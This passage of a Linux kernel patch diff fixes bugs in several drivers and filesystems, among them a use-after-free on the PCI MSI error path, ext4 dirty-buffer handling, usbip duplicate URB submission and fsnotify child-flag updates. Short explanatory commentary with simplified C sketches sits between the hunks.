+ 		return -EIO;
+ 
+ 	if (count < header_size + 1 || count > 1024 * 4)
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/runtime.h b/drivers/net/wireless/intel/iwlwifi/fw/runtime.h
+index d3cb1ae68a96c..7b7bf3aecc143 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/runtime.h
++++ b/drivers/net/wireless/intel/iwlwifi/fw/runtime.h
+@@ -18,7 +18,6 @@
+ struct iwl_fw_runtime_ops {
+ 	void (*dump_start)(void *ctx);
+ 	void (*dump_end)(void *ctx);
+-	bool (*fw_running)(void *ctx);
+ 	int (*send_hcmd)(void *ctx, struct iwl_host_cmd *host_cmd);
+ 	bool (*d3_debug_enable)(void *ctx);
+ };
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+index 864f5fb260409..88b6d4e566c40 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+@@ -670,11 +670,6 @@ static void iwl_mvm_fwrt_dump_end(void *ctx)
+ 	mutex_unlock(&mvm->mutex);
+ }
+ 
+-static bool iwl_mvm_fwrt_fw_running(void *ctx)
+-{
+-	return iwl_mvm_firmware_running(ctx);
+-}
+-
+ static int iwl_mvm_fwrt_send_hcmd(void *ctx, struct iwl_host_cmd *host_cmd)
+ {
+ 	struct iwl_mvm *mvm = (struct iwl_mvm *)ctx;
+@@ -695,7 +690,6 @@ static bool iwl_mvm_d3_debug_enable(void *ctx)
+ static const struct iwl_fw_runtime_ops iwl_mvm_fwrt_ops = {
+ 	.dump_start = iwl_mvm_fwrt_dump_start,
+ 	.dump_end = iwl_mvm_fwrt_dump_end,
+-	.fw_running = iwl_mvm_fwrt_fw_running,
+ 	.send_hcmd = iwl_mvm_fwrt_send_hcmd,
+ 	.d3_debug_enable = iwl_mvm_d3_debug_enable,
+ };
+diff --git a/drivers/net/wireless/realtek/rtw89/ser.c b/drivers/net/wireless/realtek/rtw89/ser.c
+index c1a4bc1c64d16..afb1b41e1a9a5 100644
+--- a/drivers/net/wireless/realtek/rtw89/ser.c
++++ b/drivers/net/wireless/realtek/rtw89/ser.c
+@@ -304,9 +304,13 @@ static void ser_reset_vif(struct rtw89_dev *rtwdev, struct rtw89_vif *rtwvif)
+ 
+ static void ser_sta_deinit_cam_iter(void *data, struct ieee80211_sta *sta)
+ {
+-	struct rtw89_vif *rtwvif = (struct rtw89_vif *)data;
+-	struct rtw89_dev *rtwdev = rtwvif->rtwdev;
++	struct rtw89_vif *target_rtwvif = (struct rtw89_vif *)data;
+ 	struct rtw89_sta *rtwsta = (struct rtw89_sta *)sta->drv_priv;
++	struct rtw89_vif *rtwvif = rtwsta->rtwvif;
++	struct rtw89_dev *rtwdev = rtwvif->rtwdev;
++
++	if (rtwvif != target_rtwvif)
++		return;
+ 
+ 	if (rtwvif->net_type == RTW89_NET_TYPE_AP_MODE || sta->tdls)
+ 		rtw89_cam_deinit_addr_cam(rtwdev, &rtwsta->addr_cam);
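
The fix illustrates a general mac80211 rule: station iterators visit every station on the hardware, across all vifs, so a handler doing per-vif work must filter inside the callback. A minimal sketch of that filter (the function name is made up; the two drv_priv fields are the ones used above):

    static void per_vif_sta_iter(void *data, struct ieee80211_sta *sta)
    {
    	struct rtw89_vif *target = data;
    	struct rtw89_sta *rtwsta = (struct rtw89_sta *)sta->drv_priv;

    	if (rtwsta->rtwvif != target)
    		return;		/* station belongs to another interface */

    	/* ... per-station teardown for the target vif only ... */
    }
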
+diff --git a/drivers/pci/controller/dwc/pcie-al.c b/drivers/pci/controller/dwc/pcie-al.c
+index b8cb77c9c4bd2..3132b27bc0064 100644
+--- a/drivers/pci/controller/dwc/pcie-al.c
++++ b/drivers/pci/controller/dwc/pcie-al.c
+@@ -242,18 +242,24 @@ static struct pci_ops al_child_pci_ops = {
+ 	.write = pci_generic_config_write,
+ };
+ 
+-static void al_pcie_config_prepare(struct al_pcie *pcie)
++static int al_pcie_config_prepare(struct al_pcie *pcie)
+ {
+ 	struct al_pcie_target_bus_cfg *target_bus_cfg;
+ 	struct dw_pcie_rp *pp = &pcie->pci->pp;
+ 	unsigned int ecam_bus_mask;
++	struct resource_entry *ft;
+ 	u32 cfg_control_offset;
++	struct resource *bus;
+ 	u8 subordinate_bus;
+ 	u8 secondary_bus;
+ 	u32 cfg_control;
+ 	u32 reg;
+-	struct resource *bus = resource_list_first_type(&pp->bridge->windows, IORESOURCE_BUS)->res;
+ 
++	ft = resource_list_first_type(&pp->bridge->windows, IORESOURCE_BUS);
++	if (!ft)
++		return -ENODEV;
++
++	bus = ft->res;
+ 	target_bus_cfg = &pcie->target_bus_cfg;
+ 
+ 	ecam_bus_mask = (pcie->ecam_size >> PCIE_ECAM_BUS_SHIFT) - 1;
+@@ -287,6 +293,8 @@ static void al_pcie_config_prepare(struct al_pcie *pcie)
+ 	       FIELD_PREP(CFG_CONTROL_SEC_BUS_MASK, secondary_bus);
+ 
+ 	al_pcie_controller_writel(pcie, cfg_control_offset, reg);
++
++	return 0;
+ }
+ 
+ static int al_pcie_host_init(struct dw_pcie_rp *pp)
+@@ -305,7 +313,9 @@ static int al_pcie_host_init(struct dw_pcie_rp *pp)
+ 	if (rc)
+ 		return rc;
+ 
+-	al_pcie_config_prepare(pcie);
++	rc = al_pcie_config_prepare(pcie);
++	if (rc)
++		return rc;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/pci/msi/msi.c b/drivers/pci/msi/msi.c
+index fdd2ec09651e9..c5cc3e453fd0c 100644
+--- a/drivers/pci/msi/msi.c
++++ b/drivers/pci/msi/msi.c
+@@ -431,7 +431,7 @@ static int msi_capability_init(struct pci_dev *dev, int nvec,
+ 			       struct irq_affinity *affd)
+ {
+ 	struct irq_affinity_desc *masks = NULL;
+-	struct msi_desc *entry;
++	struct msi_desc *entry, desc;
+ 	int ret;
+ 
+ 	/*
+@@ -452,6 +452,12 @@ static int msi_capability_init(struct pci_dev *dev, int nvec,
+ 	/* All MSIs are unmasked by default; mask them all */
+ 	entry = msi_first_desc(&dev->dev, MSI_DESC_ALL);
+ 	pci_msi_mask(entry, msi_multi_mask(entry));
++	/*
++	 * Copy the MSI descriptor for the error path because
++	 * pci_msi_setup_msi_irqs() will free it for the hierarchical
++	 * interrupt domain case.
++	 */
++	memcpy(&desc, entry, sizeof(desc));
+ 
+ 	/* Configure MSI capability structure */
+ 	ret = pci_msi_setup_msi_irqs(dev, nvec, PCI_CAP_ID_MSI);
+@@ -471,7 +477,7 @@ static int msi_capability_init(struct pci_dev *dev, int nvec,
+ 	goto unlock;
+ 
+ err:
+-	pci_msi_unmask(entry, msi_multi_mask(entry));
++	pci_msi_unmask(&desc, msi_multi_mask(&desc));
+ 	free_msi_irqs(dev);
+ fail:
+ 	dev->msi_enabled = 0;
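
The copy exists because, in the hierarchical irqdomain case, pci_msi_setup_msi_irqs() frees the msi_desc that entry points at when it fails, so the error path must unmask through a snapshot rather than the original pointer. The shape of the pattern, reduced to a sketch (setup_may_free_entry() is a stand-in for the real setup call):

    	struct msi_desc desc, *entry;

    	entry = msi_first_desc(&dev->dev, MSI_DESC_ALL);
    	pci_msi_mask(entry, msi_multi_mask(entry));
    	memcpy(&desc, entry, sizeof(desc));	/* 'entry' may not survive */

    	if (setup_may_free_entry(dev, nvec)) {
    		/* touching *entry here would be a use-after-free */
    		pci_msi_unmask(&desc, msi_multi_mask(&desc));
    		return -EIO;
    	}
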
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index bfed5d36fa2e5..d528ee0092bd2 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -6307,7 +6307,8 @@ static void ufshcd_err_handler(struct work_struct *work)
+ 	if (ufshcd_err_handling_should_stop(hba))
+ 		goto skip_err_handling;
+ 
+-	if (hba->dev_quirks & UFS_DEVICE_QUIRK_RECOVERY_FROM_DL_NAC_ERRORS) {
++	if ((hba->dev_quirks & UFS_DEVICE_QUIRK_RECOVERY_FROM_DL_NAC_ERRORS) &&
++	    !hba->force_reset) {
+ 		bool ret;
+ 
+ 		spin_unlock_irqrestore(hba->host->host_lock, flags);
+diff --git a/drivers/usb/typec/ucsi/ucsi.h b/drivers/usb/typec/ucsi/ucsi.h
+index dbb10cb310d4c..4a1a86e37fd52 100644
+--- a/drivers/usb/typec/ucsi/ucsi.h
++++ b/drivers/usb/typec/ucsi/ucsi.h
+@@ -373,7 +373,7 @@ ucsi_register_displayport(struct ucsi_connector *con,
+ 			  bool override, int offset,
+ 			  struct typec_altmode_desc *desc)
+ {
+-	return NULL;
++	return typec_port_register_altmode(con->port, desc);
+ }
+ 
+ static inline void
+diff --git a/drivers/usb/usbip/stub_rx.c b/drivers/usb/usbip/stub_rx.c
+index fc01b31bbb875..6338d818bc8bc 100644
+--- a/drivers/usb/usbip/stub_rx.c
++++ b/drivers/usb/usbip/stub_rx.c
+@@ -144,53 +144,62 @@ static int tweak_set_configuration_cmd(struct urb *urb)
+ 	if (err && err != -ENODEV)
+ 		dev_err(&sdev->udev->dev, "can't set config #%d, error %d\n",
+ 			config, err);
+-	return 0;
++	return err;
+ }
+ 
+ static int tweak_reset_device_cmd(struct urb *urb)
+ {
+ 	struct stub_priv *priv = (struct stub_priv *) urb->context;
+ 	struct stub_device *sdev = priv->sdev;
++	int err;
+ 
+ 	dev_info(&urb->dev->dev, "usb_queue_reset_device\n");
+ 
+-	if (usb_lock_device_for_reset(sdev->udev, NULL) < 0) {
++	err = usb_lock_device_for_reset(sdev->udev, NULL);
++	if (err < 0) {
+ 		dev_err(&urb->dev->dev, "could not obtain lock to reset device\n");
+-		return 0;
++		return err;
+ 	}
+-	usb_reset_device(sdev->udev);
++	err = usb_reset_device(sdev->udev);
+ 	usb_unlock_device(sdev->udev);
+ 
+-	return 0;
++	return err;
+ }
+ 
+ /*
+  * clear_halt, set_interface, and set_configuration require special tricks.
++ * Returns 1 if the request was tweaked, 0 otherwise.
+  */
+-static void tweak_special_requests(struct urb *urb)
++static int tweak_special_requests(struct urb *urb)
+ {
++	int err;
++
+ 	if (!urb || !urb->setup_packet)
+-		return;
++		return 0;
+ 
+ 	if (usb_pipetype(urb->pipe) != PIPE_CONTROL)
+-		return;
++		return 0;
+ 
+ 	if (is_clear_halt_cmd(urb))
+ 		/* tweak clear_halt */
+-		 tweak_clear_halt_cmd(urb);
++		err = tweak_clear_halt_cmd(urb);
+ 
+ 	else if (is_set_interface_cmd(urb))
+ 		/* tweak set_interface */
+-		tweak_set_interface_cmd(urb);
++		err = tweak_set_interface_cmd(urb);
+ 
+ 	else if (is_set_configuration_cmd(urb))
+ 		/* tweak set_configuration */
+-		tweak_set_configuration_cmd(urb);
++		err = tweak_set_configuration_cmd(urb);
+ 
+ 	else if (is_reset_device_cmd(urb))
+-		tweak_reset_device_cmd(urb);
+-	else
++		err = tweak_reset_device_cmd(urb);
++	else {
+ 		usbip_dbg_stub_rx("no need to tweak\n");
++		return 0;
++	}
++
++	return !err;
+ }
+ 
+ /*
+@@ -468,6 +477,7 @@ static void stub_recv_cmd_submit(struct stub_device *sdev,
+ 	int support_sg = 1;
+ 	int np = 0;
+ 	int ret, i;
++	int is_tweaked;
+ 
+ 	if (pipe == -1)
+ 		return;
+@@ -580,8 +590,11 @@ static void stub_recv_cmd_submit(struct stub_device *sdev,
+ 		priv->urbs[i]->pipe = pipe;
+ 		priv->urbs[i]->complete = stub_complete;
+ 
+-		/* no need to submit an intercepted request, but harmless? */
+-		tweak_special_requests(priv->urbs[i]);
++		/*
++		 * all URBs belong to a single PDU, so a global is_tweaked flag is
++		 * enough
++		 */
++		is_tweaked = tweak_special_requests(priv->urbs[i]);
+ 
+ 		masking_bogus_flags(priv->urbs[i]);
+ 	}
+@@ -594,22 +607,32 @@ static void stub_recv_cmd_submit(struct stub_device *sdev,
+ 
+ 	/* urb is now ready to submit */
+ 	for (i = 0; i < priv->num_urbs; i++) {
+-		ret = usb_submit_urb(priv->urbs[i], GFP_KERNEL);
++		if (!is_tweaked) {
++			ret = usb_submit_urb(priv->urbs[i], GFP_KERNEL);
+ 
+-		if (ret == 0)
+-			usbip_dbg_stub_rx("submit urb ok, seqnum %u\n",
+-					pdu->base.seqnum);
+-		else {
+-			dev_err(&udev->dev, "submit_urb error, %d\n", ret);
+-			usbip_dump_header(pdu);
+-			usbip_dump_urb(priv->urbs[i]);
++			if (ret == 0)
++				usbip_dbg_stub_rx("submit urb ok, seqnum %u\n",
++						pdu->base.seqnum);
++			else {
++				dev_err(&udev->dev, "submit_urb error, %d\n", ret);
++				usbip_dump_header(pdu);
++				usbip_dump_urb(priv->urbs[i]);
+ 
++				/*
++				 * Pessimistic.
++				 * This connection will be discarded.
++				 */
++				usbip_event_add(ud, SDEV_EVENT_ERROR_SUBMIT);
++				break;
++			}
++		} else {
+ 			/*
+-			 * Pessimistic.
+-			 * This connection will be discarded.
++			 * An identical URB was already submitted in
++			 * tweak_special_requests(). Skip submitting this URB
++			 * to avoid duplicating the request.
+ 			 */
+-			usbip_event_add(ud, SDEV_EVENT_ERROR_SUBMIT);
+-			break;
++			priv->urbs[i]->status = 0;
++			stub_complete(priv->urbs[i]);
+ 		}
+ 	}
+ 
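
With the return value plumbed through, tweak_special_requests() yields !err: 1 only when a tweak was attempted and succeeded, so a failed tweak still reaches the normal submit path below. A condensed sketch of the resulting submit loop (logging trimmed):

    	for (i = 0; i < priv->num_urbs; i++) {
    		if (is_tweaked) {
    			/* The request already ran inside the tweak
    			 * helper; report success without a second
    			 * submission. */
    			priv->urbs[i]->status = 0;
    			stub_complete(priv->urbs[i]);
    		} else if (usb_submit_urb(priv->urbs[i], GFP_KERNEL)) {
    			usbip_event_add(ud, SDEV_EVENT_ERROR_SUBMIT);
    			break;
    		}
    	}
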
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index 92b540754799c..e8ee1ccd9a111 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -3229,7 +3229,7 @@ static int ext4_split_extent_at(handle_t *handle,
+ 		ext4_ext_mark_unwritten(ex2);
+ 
+ 	err = ext4_ext_insert_extent(handle, inode, ppath, &newex, flags);
+-	if (err != -ENOSPC && err != -EDQUOT)
++	if (err != -ENOSPC && err != -EDQUOT && err != -ENOMEM)
+ 		goto out;
+ 
+ 	if (EXT4_EXT_MAY_ZEROOUT & split_flag) {
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 93a1c22048de6..7aa0a88733982 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -5101,9 +5101,12 @@ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 				 "iget: bogus i_mode (%o)", inode->i_mode);
+ 		goto bad_inode;
+ 	}
+-	if (IS_CASEFOLDED(inode) && !ext4_has_feature_casefold(inode->i_sb))
++	if (IS_CASEFOLDED(inode) && !ext4_has_feature_casefold(inode->i_sb)) {
+ 		ext4_error_inode(inode, function, line, 0,
+ 				 "casefold flag without casefold feature");
++		ret = -EFSCORRUPTED;
++		goto bad_inode;
++	}
+ 	if ((err_str = check_igot_inode(inode, flags)) != NULL) {
+ 		ext4_error_inode(inode, function, line, 0, err_str);
+ 		ret = -EFSCORRUPTED;
+diff --git a/fs/ext4/page-io.c b/fs/ext4/page-io.c
+index d0302b66c215d..d9d9650a7281d 100644
+--- a/fs/ext4/page-io.c
++++ b/fs/ext4/page-io.c
+@@ -484,6 +484,13 @@ int ext4_bio_write_page(struct ext4_io_submit *io,
+ 			/* A hole? We can safely clear the dirty bit */
+ 			if (!buffer_mapped(bh))
+ 				clear_buffer_dirty(bh);
++			/*
++			 * Are we keeping a buffer dirty that we cannot
++			 * write? Make sure to redirty the page. This
++			 * happens e.g. when doing writeout for a
++			 * transaction commit.
++			 */
++			if (buffer_dirty(bh) && !PageDirty(page))
++				redirty_page_for_writepage(wbc, page);
+ 			if (io->io_bio)
+ 				ext4_io_submit(io);
+ 			continue;
+@@ -491,6 +498,7 @@ int ext4_bio_write_page(struct ext4_io_submit *io,
+ 		if (buffer_new(bh))
+ 			clear_buffer_new(bh);
+ 		set_buffer_async_write(bh);
++		clear_buffer_dirty(bh);
+ 		nr_to_submit++;
+ 	} while ((bh = bh->b_this_page) != head);
+ 
+@@ -534,7 +542,10 @@ int ext4_bio_write_page(struct ext4_io_submit *io,
+ 			printk_ratelimited(KERN_ERR "%s: ret = %d\n", __func__, ret);
+ 			redirty_page_for_writepage(wbc, page);
+ 			do {
+-				clear_buffer_async_write(bh);
++				if (buffer_async_write(bh)) {
++					clear_buffer_async_write(bh);
++					set_buffer_dirty(bh);
++				}
+ 				bh = bh->b_this_page;
+ 			} while (bh != head);
+ 			goto unlock;
+@@ -547,7 +558,6 @@ int ext4_bio_write_page(struct ext4_io_submit *io,
+ 			continue;
+ 		io_submit_add_bh(io, inode, page, bounce_page, bh);
+ 		nr_submitted++;
+-		clear_buffer_dirty(bh);
+ 	} while ((bh = bh->b_this_page) != head);
+ 
+ unlock:
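
The hunks move the dirty-to-async_write transition to the point where a buffer is selected for writeout, and make both the skip path and the error path preserve dirtiness, so no dirty data can be silently dropped. The discipline, reduced to a sketch (can_write() stands for the mapped/hole checks in the real function):

    	do {
    		if (!can_write(bh)) {
    			/* Skipping a still-dirty buffer must keep the
    			 * page dirty, or the data is never written. */
    			if (buffer_dirty(bh) && !PageDirty(page))
    				redirty_page_for_writepage(wbc, page);
    			continue;
    		}
    		set_buffer_async_write(bh);
    		clear_buffer_dirty(bh);	/* claimed for this submission */
    	} while ((bh = bh->b_this_page) != head);

    	/* Error unwind: roll back only the buffers actually claimed. */
    	bh = head;
    	do {
    		if (buffer_async_write(bh)) {
    			clear_buffer_async_write(bh);
    			set_buffer_dirty(bh);
    		}
    	} while ((bh = bh->b_this_page) != head);
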
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index a02c748753161..2b540d87859e0 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -788,6 +788,7 @@ enum {
+ 	FI_ALIGNED_WRITE,	/* enable aligned write */
+ 	FI_COW_FILE,		/* indicate COW file */
+ 	FI_ATOMIC_COMMITTED,	/* indicate atomic commit completed except disk sync */
++	FI_OPENED_FILE,         /* indicate file has been opened */
+ 	FI_MAX,			/* max flag, never be used */
+ };
+ 
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index c6fb179f9d4af..62f2521cd955e 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -538,6 +538,42 @@ static int f2fs_file_mmap(struct file *file, struct vm_area_struct *vma)
+ 	return 0;
+ }
+ 
++static int finish_preallocate_blocks(struct inode *inode)
++{
++	int ret;
++
++	inode_lock(inode);
++	if (is_inode_flag_set(inode, FI_OPENED_FILE)) {
++		inode_unlock(inode);
++		return 0;
++	}
++
++	if (!file_should_truncate(inode)) {
++		set_inode_flag(inode, FI_OPENED_FILE);
++		inode_unlock(inode);
++		return 0;
++	}
++
++	f2fs_down_write(&F2FS_I(inode)->i_gc_rwsem[WRITE]);
++	filemap_invalidate_lock(inode->i_mapping);
++
++	truncate_setsize(inode, i_size_read(inode));
++	ret = f2fs_truncate(inode);
++
++	filemap_invalidate_unlock(inode->i_mapping);
++	f2fs_up_write(&F2FS_I(inode)->i_gc_rwsem[WRITE]);
++
++	if (!ret)
++		set_inode_flag(inode, FI_OPENED_FILE);
++
++	inode_unlock(inode);
++	if (ret)
++		return ret;
++
++	file_dont_truncate(inode);
++	return 0;
++}
++
+ static int f2fs_file_open(struct inode *inode, struct file *filp)
+ {
+ 	int err = fscrypt_file_open(inode, filp);
+@@ -554,7 +590,11 @@ static int f2fs_file_open(struct inode *inode, struct file *filp)
+ 
+ 	filp->f_mode |= FMODE_NOWAIT;
+ 
+-	return dquot_file_open(inode, filp);
++	err = dquot_file_open(inode, filp);
++	if (err)
++		return err;
++
++	return finish_preallocate_blocks(inode);
+ }
+ 
+ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index ff4a4e92a40c7..5b672df194a99 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -549,14 +549,6 @@ struct inode *f2fs_iget(struct super_block *sb, unsigned long ino)
+ 	}
+ 	f2fs_set_inode_flags(inode);
+ 
+-	if (file_should_truncate(inode) &&
+-			!is_sbi_flag_set(sbi, SBI_POR_DOING)) {
+-		ret = f2fs_truncate(inode);
+-		if (ret)
+-			goto bad_inode;
+-		file_dont_truncate(inode);
+-	}
+-
+ 	unlock_new_inode(inode);
+ 	trace_f2fs_iget(inode);
+ 	return inode;
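
Together these hunks move the deferred truncation of extra preallocated blocks from f2fs_iget() to the first f2fs_file_open(), where i_gc_rwsem and the mapping's invalidate lock can be taken safely; FI_OPENED_FILE turns later opens into a cheap flag test. A condensed sketch of the once-per-inode gate (locking and the unlock ordering of the real function are elided):

    static int first_open_fixup(struct inode *inode)
    {
    	int ret;

    	if (is_inode_flag_set(inode, FI_OPENED_FILE))
    		return 0;			/* fast path after first open */

    	if (file_should_truncate(inode)) {
    		ret = f2fs_truncate(inode);	/* drop excess preallocation */
    		if (ret)
    			return ret;		/* flag unset: retried on next open */
    		file_dont_truncate(inode);
    	}

    	set_inode_flag(inode, FI_OPENED_FILE);
    	return 0;
    }
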
+diff --git a/fs/notify/fsnotify.c b/fs/notify/fsnotify.c
+index 7974e91ffe134..b5d8f238fce42 100644
+--- a/fs/notify/fsnotify.c
++++ b/fs/notify/fsnotify.c
+@@ -103,17 +103,13 @@ void fsnotify_sb_delete(struct super_block *sb)
+  * parent cares.  Thus when an event happens on a child it can quickly tell
+  * if there is a need to find a parent and send the event to the parent.
+  */
+-void __fsnotify_update_child_dentry_flags(struct inode *inode)
++void fsnotify_set_children_dentry_flags(struct inode *inode)
+ {
+ 	struct dentry *alias;
+-	int watched;
+ 
+ 	if (!S_ISDIR(inode->i_mode))
+ 		return;
+ 
+-	/* determine if the children should tell inode about their events */
+-	watched = fsnotify_inode_watches_children(inode);
+-
+ 	spin_lock(&inode->i_lock);
+ 	/* run all of the dentries associated with this inode.  Since this is a
+ 	 * directory, there damn well better only be one item on this list */
+@@ -129,10 +125,7 @@ void __fsnotify_update_child_dentry_flags(struct inode *inode)
+ 				continue;
+ 
+ 			spin_lock_nested(&child->d_lock, DENTRY_D_LOCK_NESTED);
+-			if (watched)
+-				child->d_flags |= DCACHE_FSNOTIFY_PARENT_WATCHED;
+-			else
+-				child->d_flags &= ~DCACHE_FSNOTIFY_PARENT_WATCHED;
++			child->d_flags |= DCACHE_FSNOTIFY_PARENT_WATCHED;
+ 			spin_unlock(&child->d_lock);
+ 		}
+ 		spin_unlock(&alias->d_lock);
+@@ -140,6 +133,24 @@ void __fsnotify_update_child_dentry_flags(struct inode *inode)
+ 	spin_unlock(&inode->i_lock);
+ }
+ 
++/*
++ * Lazily clear false positive PARENT_WATCHED flag for child whose parent had
++ * stopped watching children.
++ */
++static void fsnotify_clear_child_dentry_flag(struct inode *pinode,
++					     struct dentry *dentry)
++{
++	spin_lock(&dentry->d_lock);
++	/*
++	 * d_lock is a sufficient barrier to prevent observing a non-watched
++	 * parent state from before the fsnotify_set_children_dentry_flags()
++	 * or fsnotify_update_flags() call that had set PARENT_WATCHED.
++	 */
++	if (!fsnotify_inode_watches_children(pinode))
++		dentry->d_flags &= ~DCACHE_FSNOTIFY_PARENT_WATCHED;
++	spin_unlock(&dentry->d_lock);
++}
++
+ /* Are inode/sb/mount interested in parent and name info with this event? */
+ static bool fsnotify_event_needs_parent(struct inode *inode, struct mount *mnt,
+ 					__u32 mask)
+@@ -208,7 +219,7 @@ int __fsnotify_parent(struct dentry *dentry, __u32 mask, const void *data,
+ 	p_inode = parent->d_inode;
+ 	p_mask = fsnotify_inode_watches_children(p_inode);
+ 	if (unlikely(parent_watched && !p_mask))
+-		__fsnotify_update_child_dentry_flags(p_inode);
++		fsnotify_clear_child_dentry_flag(p_inode, dentry);
+ 
+ 	/*
+ 	 * Include parent/name in notification either if some notification
+diff --git a/fs/notify/fsnotify.h b/fs/notify/fsnotify.h
+index fde74eb333cc9..2b4267de86e6b 100644
+--- a/fs/notify/fsnotify.h
++++ b/fs/notify/fsnotify.h
+@@ -74,7 +74,7 @@ static inline void fsnotify_clear_marks_by_sb(struct super_block *sb)
+  * update the dentry->d_flags of all of inode's children to indicate if inode cares
+  * about events that happen to its children.
+  */
+-extern void __fsnotify_update_child_dentry_flags(struct inode *inode);
++extern void fsnotify_set_children_dentry_flags(struct inode *inode);
+ 
+ extern struct kmem_cache *fsnotify_mark_connector_cachep;
+ 
+diff --git a/fs/notify/mark.c b/fs/notify/mark.c
+index c74ef947447d6..4be6e883d492f 100644
+--- a/fs/notify/mark.c
++++ b/fs/notify/mark.c
+@@ -176,6 +176,24 @@ static void *__fsnotify_recalc_mask(struct fsnotify_mark_connector *conn)
+ 	return fsnotify_update_iref(conn, want_iref);
+ }
+ 
++static bool fsnotify_conn_watches_children(
++					struct fsnotify_mark_connector *conn)
++{
++	if (conn->type != FSNOTIFY_OBJ_TYPE_INODE)
++		return false;
++
++	return fsnotify_inode_watches_children(fsnotify_conn_inode(conn));
++}
++
++static void fsnotify_conn_set_children_dentry_flags(
++					struct fsnotify_mark_connector *conn)
++{
++	if (conn->type != FSNOTIFY_OBJ_TYPE_INODE)
++		return;
++
++	fsnotify_set_children_dentry_flags(fsnotify_conn_inode(conn));
++}
++
+ /*
+  * Calculate mask of events for a list of marks. The caller must make sure
+  * connector and connector->obj cannot disappear under us.  Callers achieve
+@@ -184,15 +202,23 @@ static void *__fsnotify_recalc_mask(struct fsnotify_mark_connector *conn)
+  */
+ void fsnotify_recalc_mask(struct fsnotify_mark_connector *conn)
+ {
++	bool update_children;
++
+ 	if (!conn)
+ 		return;
+ 
+ 	spin_lock(&conn->lock);
++	update_children = !fsnotify_conn_watches_children(conn);
+ 	__fsnotify_recalc_mask(conn);
++	update_children &= fsnotify_conn_watches_children(conn);
+ 	spin_unlock(&conn->lock);
+-	if (conn->type == FSNOTIFY_OBJ_TYPE_INODE)
+-		__fsnotify_update_child_dentry_flags(
+-					fsnotify_conn_inode(conn));
++	/*
++	 * Set children's PARENT_WATCHED flags only if parent started watching.
++	 * When parent stops watching, we clear false positive PARENT_WATCHED
++	 * flags lazily in __fsnotify_parent().
++	 */
++	if (update_children)
++		fsnotify_conn_set_children_dentry_flags(conn);
+ }
+ 
+ /* Free all connectors queued for freeing once SRCU period ends */
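
Across the three fsnotify files the policy becomes asymmetric: child dentry flags are set eagerly only on the transition from not watching to watching, and cleared lazily, per dentry, when __fsnotify_parent() sees a stale flag. The transition test is the compact part (watches_children() is shorthand for fsnotify_conn_watches_children() from the hunk above):

    	bool update_children;

    	spin_lock(&conn->lock);
    	update_children = !watches_children(conn);	/* off before... */
    	__fsnotify_recalc_mask(conn);
    	update_children &= watches_children(conn);	/* ...and on after */
    	spin_unlock(&conn->lock);

    	/* Only the off-to-on edge walks all children eagerly; the
    	 * on-to-off edge is repaired lazily, one dentry at a time,
    	 * when __fsnotify_parent() notices a stale PARENT_WATCHED. */
    	if (update_children)
    		fsnotify_conn_set_children_dentry_flags(conn);
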
+diff --git a/fs/udf/super.c b/fs/udf/super.c
+index 65fbc60a88e44..3b6419f29a4c7 100644
+--- a/fs/udf/super.c
++++ b/fs/udf/super.c
+@@ -86,6 +86,13 @@ enum {
+ #define UDF_MAX_LVID_NESTING 1000
+ 
+ enum { UDF_MAX_LINKS = 0xffff };
++/*
++ * We limit filesize to 4TB. This is arbitrary as the on-disk format supports
++ * more but because the file space is described by a linked list of extents,
++ * each of which can have at most 1GB, the creation and handling of extents
++ * gets unusably slow beyond certain point...
++ */
++#define UDF_MAX_FILESIZE (1ULL << 42)
+ 
+ /* These are the "meat" - everything else is stuffing */
+ static int udf_fill_super(struct super_block *, void *, int);
+@@ -2299,7 +2306,7 @@ static int udf_fill_super(struct super_block *sb, void *options, int silent)
+ 		ret = -ENOMEM;
+ 		goto error_out;
+ 	}
+-	sb->s_maxbytes = MAX_LFS_FILESIZE;
++	sb->s_maxbytes = UDF_MAX_FILESIZE;
+ 	sb->s_max_links = UDF_MAX_LINKS;
+ 	return 0;
+ 
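
The 4TB number follows from the comment's extent math: 2^42 bytes at one 2^30-byte extent per list node is already 4096 nodes to walk linearly, and every further terabyte adds roughly another 1024. A trivial standalone check of the arithmetic:

    #include <stdio.h>

    int main(void)
    {
    	unsigned long long max_filesize = 1ULL << 42;	/* UDF_MAX_FILESIZE */
    	unsigned long long max_extent   = 1ULL << 30;	/* 1 GiB per extent */

    	/* ~4096 extents at the cap; extent lists are walked linearly. */
    	printf("extents at cap: %llu\n", max_filesize / max_extent);
    	return 0;
    }
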
+diff --git a/include/clocksource/timer-xilinx.h b/include/clocksource/timer-xilinx.h
+index c0f56fe6d22ae..d116f18de899c 100644
+--- a/include/clocksource/timer-xilinx.h
++++ b/include/clocksource/timer-xilinx.h
+@@ -41,7 +41,7 @@ struct regmap;
+ struct xilinx_timer_priv {
+ 	struct regmap *map;
+ 	struct clk *clk;
+-	u32 max;
++	u64 max;
+ };
+ 
+ /**
+diff --git a/include/linux/fsnotify_backend.h b/include/linux/fsnotify_backend.h
+index d7d96c806bff2..096b79e4373f4 100644
+--- a/include/linux/fsnotify_backend.h
++++ b/include/linux/fsnotify_backend.h
+@@ -563,12 +563,14 @@ static inline __u32 fsnotify_parent_needed_mask(__u32 mask)
+ 
+ static inline int fsnotify_inode_watches_children(struct inode *inode)
